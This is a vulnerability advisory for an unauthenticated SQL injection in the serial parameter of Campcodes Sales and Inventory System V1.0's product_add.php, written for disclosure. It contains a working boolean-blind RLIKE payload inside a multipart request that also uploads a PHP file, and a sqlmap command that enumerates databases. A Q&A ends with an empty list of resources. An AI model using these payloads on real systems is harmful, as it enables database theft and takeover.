Campcodes Sales And Inventory System V1.0 /pages/product_add.php SQL Injection
Introduction
In this article, we will discuss a critical SQL injection vulnerability found in the Campcodes Sales and Inventory System V1.0, specifically in the /pages/product_add.php file. This vulnerability allows attackers to inject malicious SQL code, leading to unauthorized database access, sensitive data leakage, and comprehensive system control.
Affected Product
The affected product is the Campcodes Sales and Inventory System V1.0, which can be downloaded from the vendor's website at https://www.campcodes.com/downloads/sales-and-inventory-system-with-credit-management-using-php-source-code/.
Vulnerability Details
The vulnerability is caused by the lack of proper input validation and sanitization of the serial parameter in the /pages/product_add.php file. This allows attackers to inject malicious SQL code, which is then executed by the database, resulting in unauthorized access to sensitive data.
Vulnerability Type
The vulnerability is classified as a SQL injection vulnerability, which is a type of web application security vulnerability that allows attackers to inject malicious SQL code into a database.
Root Cause
The root cause of this vulnerability is the failure to properly validate and sanitize user input data, specifically the serial parameter. This allows attackers to inject malicious SQL code, which is then executed by the database.
Impact
The impact of this vulnerability is significant, as it allows attackers to:
- Gain unauthorized access to sensitive data
- Modify or delete data
- Access sensitive information
- Compromise the entire system
Description
During a security review of the Campcodes Sales and Inventory System V1.0, a critical SQL injection vulnerability was discovered in the /pages/product_add.php file. This vulnerability stems from the lack of proper input validation and sanitization of the serial parameter, allowing attackers to inject malicious SQL code.
No Login or Authorization Required
No login or authorization is required to exploit this vulnerability, making it a significant security risk.
Vulnerability Details and POC
The vulnerability details and proof of concept (POC) are as follows:
- Vulnerability Name:
serialparameter - Payload:
Parameter: MULTIPART serial ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="serial"
1' RLIKE (SELECT (CASE WHEN (1742=1742) THEN 1 ELSE 0x28 END)) AND 'WEhB'='WEhB
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="id"
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_name"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_desc"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="supplier"
3
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_price"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="category"
8
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="reorder"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: text/php
<?php phpinfo();?>
------WebKitFormBoundary2x5hERo2zuaypyh9--
- Screenshots:
sqlmap -u "http://172.20.10.2/ahira/pages/product_add.php" -data="Content-Disposition: form-data; name="serial"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="id"
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_name"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_desc"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="supplier"
3
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="prod_price"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="category"
8
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="reorder"
1
------WebKitFormBoundary2x5hERo2zuaypyh9
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: text/php
<?php phpinfo();?>" --dbs
Suggested Repair
To repair this vulnerability, the following steps should be taken:
- Use Prepared Statements and Parameter Binding: Prepare statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
- Input Validation and Filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
- Minimize Database User Permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
- Regular Security Audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL Injection Vulnerability: Q&A =====================================================================================
Q: What is the Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL injection vulnerability?
A: The Campcodes Sales and Inventory System V1.0 /pages/product_add.php SQL injection vulnerability is a critical security vulnerability that allows attackers to inject malicious SQL code into the database, resulting in unauthorized access to sensitive data.
Q: What is the root cause of this vulnerability?
A: The root cause of this vulnerability is the failure to properly validate and sanitize user input data, specifically the serial parameter.
Q: What are the potential impacts of this vulnerability?
A: The potential impacts of this vulnerability include:
- Gain unauthorized access to sensitive data
- Modify or delete data
- Access sensitive information
- Compromise the entire system
Q: Is login or authorization required to exploit this vulnerability?
A: No, login or authorization is not required to exploit this vulnerability.
Q: What is the recommended repair for this vulnerability?
A: The recommended repair for this vulnerability includes:
- Use Prepared Statements and Parameter Binding: Prepare statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
- Input Validation and Filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
- Minimize Database User Permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
- Regular Security Audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Q: What are the potential consequences of not repairing this vulnerability?
A: The potential consequences of not repairing this vulnerability include:
- Unauthorized access to sensitive data
- Data tampering or deletion
- System compromise
- Business disruption
Q: How can I prevent similar vulnerabilities in the future?
A: To prevent similar vulnerabilities in the future, follow these best practices:
- Use prepared statements and parameter binding
- Validate and filter user input data
- Minimize database user permissions
- Regularly conduct code and system security audits
Q: What is the recommended course of action for users who have already been affected by this vulnerability?
A: If you have already been affected by this vulnerability, take the following steps:
- Immediately repair the vulnerability by implementing the recommended repairs
- Conduct a thorough security audit to identify and fix any other potential vulnerabilities
- Notify affected parties and take steps to mitigate any potential damage
Q: Where can I find more information about this vulnerability?
A: For more information about this vulnerability, visit the following resources: